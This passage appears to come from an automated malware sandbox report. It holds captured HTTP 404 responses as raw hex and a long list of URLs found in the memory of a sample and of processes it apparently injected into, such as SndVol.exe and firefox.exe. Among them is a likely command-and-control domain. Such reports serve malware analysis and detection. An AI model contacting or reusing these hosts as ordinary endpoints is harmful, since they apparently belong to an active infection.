9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 06 Feb 2025 07:50:44 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Thu, 06 Feb 2025 07:50:47 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 33 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 06 Feb 2025 07:50:53 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 06 Feb 2025 07:50:58 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:18 GMTServer: Apache/2.4.10 (Debian)Content-Length: 283Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 69 6e 74 65 6e 74 69 6f 6e 2e 64 69 67 69 74 61 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.intention.digital Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 06 Feb 2025 07:51:24 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: SndVol.exe, 00000009.00000002.3769579301.0000000006A68000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003398000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fdkflsddfdflkfmvdfvdf-dfksmdfllksm.com/
                Source: file.exe, 00000000.00000002.1328355914.00000000032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.5lzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.77zhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.9xiuzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aguardiente.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.americanstar.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.antuzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.automester.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.autp.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.babygirlnames.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.beautifullady.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=248421974679
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.beibizhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bitza.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bolezhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.caobizhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.careerservice.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chuyuzhibo.net/binding
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.companybuilder.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cyberpolice.cn
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dajingzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.douquzhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.douquzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.douzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.duniangzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dynaform.net
                Source: firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eduexpo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ellanse.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eroticstore.net
